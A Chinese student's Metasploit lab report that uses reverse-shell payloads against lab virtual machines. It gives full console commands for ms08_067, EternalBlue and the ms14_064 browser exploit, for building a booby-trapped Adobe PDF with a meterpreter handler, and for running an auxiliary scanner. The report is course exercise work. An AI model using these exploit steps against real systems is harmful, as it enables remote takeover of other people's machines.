实验要求:

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

(1)一个主动攻击实践,如ms08_067; (1分)

(2)一个针对浏览器的攻击,如ms11_050;(1分)

(3)一个针对客户端的攻击,如Adobe;(1分)

(3)成功应用任何一个辅助模块。(0.5分)

基础问题回答:

(1)用自己的话解释什么是 exploit , payload , encode.

  • exploit

    渗透攻击模块,利用系统服务应用中的漏洞取得权限
  • payload

    一段代码,用于渗透之后在目标主机上执行
  • encode

    用来对payload进行编码,主要是为了避免“坏字符”和做到免杀

离实战还缺些什么技术或步骤?

  • 还欠缺许多,我们目前只会使用msf的简单功能,搞不懂它的内部逻辑及运行原理,离实战还欠缺许许多多的更专业的知识

实验内容:

Exp5-1 主动攻击实践:实现ms08_067(失败)

靶机:Windows XP Professional(192.168.1.199)

payload:set payload generic/shell_reverse_tcp

实验步骤

  • 靶机和攻击机ping通成功
  • 试探靶机是否存在ms08_067这个漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.1.199

    查看到靶机存在ms08_067这个漏洞,可以开始攻击



    输入service postgresql start启动服务器,再输入msfconsole进入控制台



    查看一下ms08_067这个漏洞在哪里search ms08-067



    选择漏洞use exploit/windows/smb/ms08_067_netapi

    查看设置信息show options



    使用命令show targets查看渗透攻击模块可以成功渗透攻击的平台



    之后输入如下命令:
msf exploit(ms08_067_netapi) > show payloads//查看可用的攻击载荷
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.127 //控制主机ip
msf exploit(ms08_067_netapi) > set LPORT 5328 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.199 //靶机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //攻击
  • 回连失败截图如下:

  • 原因好像是已经打补丁修复了,没办法,只好换一个虚拟机

实现ms17_010_eternalblue(成功)

靶机:Windows 7 x64(192.168.1.205)

payload:payload/generic/shell_reverse_tcp

  • 步骤同之前:



  • 回连成功截图:

  • 使用ipconfig/all查看IP地址

  • 不知道为什么是这样的,但依然可以看到ip地址

Exp5-2 对浏览器攻击实践: 实现ms14_064(成功)

靶机:Windows XP Professional(192.168.1.199)

payload:windows/meterpreter/reverse_tcp

实验步骤

  • 依次输入以下代码:
search ms14_064 #进行查找
use exploit/windows/browser/ms14_064_ole_code_execution #选择攻击模块
show payloads #显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp #设置tcp反向连接
show targets #查看靶机
set SRVHOST 192.168.1.127 #设置攻方IP
set AllowPowerShellPrompt true #因为msf中自带的漏洞利用exp调用的是 powershell。 所以msf中的exp代码只对安装powershell的系统生效
set LHOST 192.168.1.127
set target 0 #设置winXP靶机
exploit #攻击

  • 攻击成功:

Exp5-3 攻击客户端的实践:实现Adobe(成功)

靶机:Windows 7 x64(192.168.1.205)

payload:payload windows/meterpreter/reverse_tcp

实验步骤

  • 依次输入以下代码:
search adobe #进行查找
use windows/fileformat/adobe_cooltype_sing #使用漏洞
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.127#攻击者地址
set FILENAME 20165328.pdf #设置生成pdf文件的文件名
exploit #攻击
  • 生成20165328.pdf



  • 将生成的20165328.pdf复制到Window7中
  • kali中输入back退出当前模块,进入监听模块:
use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.127 #攻击者地址
exploit #攻击
  • 在靶机中打开20165328.pdf

  • 攻击成功:

Exp5-4 成功应用一个辅助模块:scanner/http/prev_dir_same_name_file(成功且唯一)

靶机:Windows 7 x64(192.168.1.205)

实验步骤

  • 输入search use auxiliary/server查看可用的辅助模块



    话说辅助模块真的多,我不确定是否有人在我前面已经使用过了这些模块,所以我是一口气拉倒中间瞎选的一个模块,应该没人和我一样(总不至于瞎选都能碰上吧)
  • 确定使用scanner/http/prev_dir_same_name_file,使用search scanner/http/prev_dir_same_name_file查找器位置

  • info查看其信息:

  • 再结合百度得来的介绍可知:

    这个模块用来检索匹配目标主机的指定路径下的文件。

    以下是有关它的功能的描述:

    该模块识别第一个父目录中与给定目录路径具有相同名称的文件。 示例:PATH为Test / backup / files /将查找Test路径下文件/backup/files.ext,.ext为设定的文件类型。

    以下结果说明扫描成功。
  • 依次输入以下代码:
set RHOSTS 192.168.205#靶机ip
set LHOST 192.168.1.127#攻击机ip
set PATH C:/#设置扫描路径为C:/
set LPORT 5328#设置端口为5328
run#运行
  • 运行成功截图如下:

实验体会

2018-2019-2 网络对抗技术 20165328 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  6. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  7. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  8. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

随机推荐

  1. 「洛谷3338」「ZJOI2014」力【FFT】

    题目链接 [BZOJ] [洛谷] 题解 首先我们需要对这个式子进行化简,否则对着这么大一坨东西只能暴力... \[F_i=\sum_{j<i} \frac{q_iq_j}{(i-j)^2}-\s ...

  2. Re.多项式除法/取模

    前言 emmm又是暂无 前置 多项式求逆 多项式除法/取模目的 还是跟之前一样顾名思义] 给定一个多项式F(x),请求出多项式Q(x)和R(x),满足F(x)=Q(x)∗G(x)+R(x),R项数小于 ...

  3. Nginx-动态添加模块

    Nginx动态添加模块 平滑升级 已经安装好的Nginx动态添加模块 说明: 已经安装好的Nginx,需要添加一个未被编译安装的模块,需要怎么弄呢? 这里已安装第三方nginx-rtmp-module ...

  4. ACM-自学之旅

    分类 知识清单 数据结构 链式前向星 树状数组 线段树 线段树的区间合并 基于ST表格的RMQ 图论 最近公共祖先 树的直径.树的重心与树的点分治 树的最小支配集,最小点覆盖与最大独立集 求无向连通图 ...

  5. c#调试快捷键

    F5 - 启动调试 Shift + F5 - 停止调试 F9 - 设置断点 Ctrl + Shift + F9 - 删除所有断点 F10 - 逐过程调试 F11 - 逐语句调试 Ctrl+R+E:  ...

  6. 转载:curl 模拟请求

    一般情况下我们会在网页上请求后台接口,但是对于需要进行多次测试的人来说,每一次都要在网页上模拟请求,是存在很大局限性的.因此,我们需要学会模拟请求,以达到跟实际请求一样的效果. 1. curl的用法 ...

  7. Linux uniq 命令

    Linux uniq 命令  Linux 命令大全 Linux uniq 命令用于检查及删除文本文件中重复出现的行列,一般与 sort 命令结合使用. uniq 可检查文本文件中重复出现的行列. 语法 ...

  8. Kubernetes之dashboard

    部署dashboard $ wget https://raw.githubusercontent.com/kubernetes/dashboard/master/src/deploy/recommen ...

  9. 【转】Redis学习笔记(四)如何用Redis实现分布式锁(1)—— 单机版

    原文地址:http://bridgeforyou.cn/2018/09/01/Redis-Dsitributed-Lock-1/ 为什么要使用分布式锁 这个问题,可以分为两个问题来回答: 为什么要使用 ...

  10. 小程序 input type number 键盘没有小数点

    在此备注一下: <input type="digit"> number:数字键盘(无小数点)idcard:数字键盘(无小数点.有个 X 键)digit:数字键盘(有小数 ...